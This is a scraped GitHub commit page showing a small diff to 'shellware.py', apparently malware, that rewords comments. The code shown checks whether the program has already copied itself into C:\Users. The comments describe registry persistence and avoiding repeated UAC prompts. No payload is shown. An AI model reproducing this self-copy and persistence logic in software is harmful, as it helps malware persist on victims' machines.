We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 17a2191 commit bb4763bCopy full SHA for bb4763b
shellware.py
@@ -108,8 +108,8 @@ def main():
108
execute()
109
110
111
-# Check to see if we're already copied to C:\Users, if so, we're going to assume
112
-# registry entry for persistence and copy to dir were succesful and not prompt UAC.
+# Check to see if we're already copied to C:\Users, if so, we know copy operation was succesful
+# and will assume registry entry for persistence was set and not prompt UAC.
113
if os.path.isfile("C:\Users\shellware.exe"):
114
pass
115
else:
0 commit comments